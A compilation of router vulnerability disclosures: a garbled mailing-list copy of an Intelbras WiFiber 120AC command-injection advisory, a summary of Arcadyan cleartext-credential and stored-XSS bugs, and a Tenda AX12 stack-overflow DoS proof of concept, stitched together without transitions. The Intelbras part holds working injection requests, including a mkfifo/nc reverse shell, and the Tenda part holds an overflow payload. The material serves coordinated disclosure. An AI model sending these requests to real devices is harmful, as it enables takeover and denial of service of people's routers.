marked by the consolidation of the company in the telecommunications> segment and we became leaders in the PABX and telephone terminals > segment. The> turn of the millennium represented the search for greater connection and> proximity to people, something that is in total harmony with our > philosophy to> this day. More consolidated in the market, in 2010 we opened 3 > manufacturing> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.> We reached our 45th birthday having reached a historic milestone: we > have been> a company listed on the B3 since February 2021. Our trajectory so far > has been> INnovative, INtelligent and INSpiring. We saw innovation, which is > part of our> DNA, increasingly present in our daily lives. And it was only possible to> write a story so full of achievements because employees, partners and > customers> were close and believed in us.">> Source: https://www.intelbras.com/en/institutional/who-we-are>>> Vulnerable versions> ------------------------------------------------------------------------------- >> WiFiber 120AC inMesh / 1.1-220216>>> Vulnerability overview> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server of the device is prone to an authenticated command > injection.> It allows an attacker to gain full access to the underlying operating > system of> the device with all implications. If such a device is acting as key > device in> an industrial network, more extensive damage in the corresponding > network can> be done by an attacker.>>> Proof of Concept> ------------------------------------------------------------------------------- >> 1) Authenticated Command Injection> The web server is prone to an authenticated command injection via POST> parameters. The following proof-of-concept shows how to inject the > command> "ls /" to the system which gets executed in the background:>> =============================================================================== >> POST /boaform/formPing6 HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 87> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/ping6.asp> Upgrade-Insecure-Requests: 1>> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 >> =============================================================================== >>> The following commands can be used to open a reverse shell:>> "rm -f /tmp/f"> "mkfifo /tmp/f"> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f">> Those commands were sent via a crafted POST request:>> =============================================================================== >> POST /boaform/formTracert HTTP/1.1> Host: 192.168.3.147> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 > Firefox/91.0> Accept: > text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8> Accept-Language: de,en-US;q=0.7,en;q=0.3> Accept-Encoding: gzip, deflate> Content-Type: application/x-www-form-urlencoded> Content-Length: 255> Origin: http://192.168.3.147> Connection: close> Referer: http://192.168.3.147/tracert.asp> Upgrade-Insecure-Requests: 1>> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 >> =============================================================================== >>> The vulnerability was manually verified on an emulated device by using > the> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).>>> Solution> ------------------------------------------------------------------------------- >> Update to firmware version 1-1-220826.>> https://backend.intelbras.com/sites/default/files/2022-08/ONT_Wifiber_120_AC_Vers%C3%A3o_1-1-220826.zip >>>> Workaround> ------------------------------------------------------------------------------- >> None>>> Recommendation> ------------------------------------------------------------------------------- >> CyberDanube recommends Intelbras customers to upgrade the firmware to the> latest version available.>>> Contact Timeline> ------------------------------------------------------------------------------- >> 2022-08-02: Contacting Intelbras via suporte@intelbras.com.br.> 2022-08-03: Request from Intelbras to send the advisory to> csirt@intelbras.com.br; Sent the advisory to this address.> 2022-08-30: Asked for status update; Vendor answered that the new > firmware>             version has been released the day before. Set the > disclosure date>             to 2022-10-03 (60 days policy).> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.> 2022-10-09: Coordinated disclosure of advisory.>>> Web: https://www.cyberdanube.com> Twitter: https://twitter.com/cyberdanube> Mail: research at cyberdanube dot com>> EOF T. Weber / @2022>

Intelbras WiFiber 120AC inMesh 1.1-220216 Command Injection

The login password of the web administrative dashboard in Arcadyan Wifi routers VRV9506JAC23 is sent in cleartext, allowing an attacker to sniff and intercept traffic to learn the administrative credentials to the router.

Vulnerabilities found on Arcadyan Routers - Asher Davila L.

The two vulnerabilities were found by **Asher Davila L.** in Arcadyan wireless modems with model number VRV9506JAC23. It is probable that they are also present in other Arcadyan models as well because their web interfaces are similar and they have common features. The following are the two vulnerabilities we found:

*   CVE-2020-9420: Cleartext transmission of sensitive information
*   CVE-2020-9419: Stored cross-site scripting

In combination, these vulnerabilities pose a significant risk: Malicious users on the network can sniff wireless modem user credentials. They can then use the sniffed credentials to access the web interface and inject persistent malicious scripts into it. It is recommended that users contact their ISPs to request a router that implements the usage of secure protocols such as HTTPS instead of HTTP.

According to Shodan, there are at least 19,887 Arcadyan devices exposed to the internet in countries such as Japan, China, United States, Germany, United Kingdom.

**Figure 1. Shodan Search**

**Figure 2. Countries where Arcadyan routers are present according to Shodan**

Additionally, some of the largest ISPs (Internet Service Providers) in Latin America and Europe provide this device to their customers as their default modem. e.g, this router is distributed by Telmex, the largest ISP of Mexico.

**Disclosure Timeline**

*   November 11, 2019 - contacted the US CERT to report the vulnerability.
*   February 25, 2020 - contacted a partner that is a vendor of the product. The vendor provided a contact to report the vulnerability.
*   February 25, 2020 - communicated the vulnerabilities to the manufacturer.

**Conclusion**

In summary, the Arcadyan wireless modem has two vulnerabilities that can be used together to compromise the device and inject malicious code. The first is the use of an insecure protocol—HTTP instead of HTTPS—which allows attackers to capture credentials. The second vulnerability is the lack of input validation, which allows attackers to inject malicious code.

CVE-2020-9420: Vulnerabilities found on Arcadyan Routers - Asher Davila L.

Tenda AX12 v22.03.01.21_CN was discovered to contain a stack overflow via the ssid parameter at /goform/fast_setting_wifi_set .

**Vulnerability description**

Affect device：Tenda-AX12 V22.03.01.21\_CN(https://www.tenda.com.cn/download/detail-3237.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability cause**

In the /goform/fast\_setting\_wifi\_set interface, the ssid parameter and the sprintf function passed through it do not limit the length, which will cause stack overflow and achieve the effect of a DoS denial of service attack.

**POC**

Poc of Denial of Service(DoS):

POST /goform/fast\_setting\_wifi\_set HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 10
Origin: http://192.168.0.1
Connection: close
Cookie: password=xxxxxxxxxx
Referer: http://192.168.0.1/main.html

ssid=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa+1000\*a

Tag

#wifi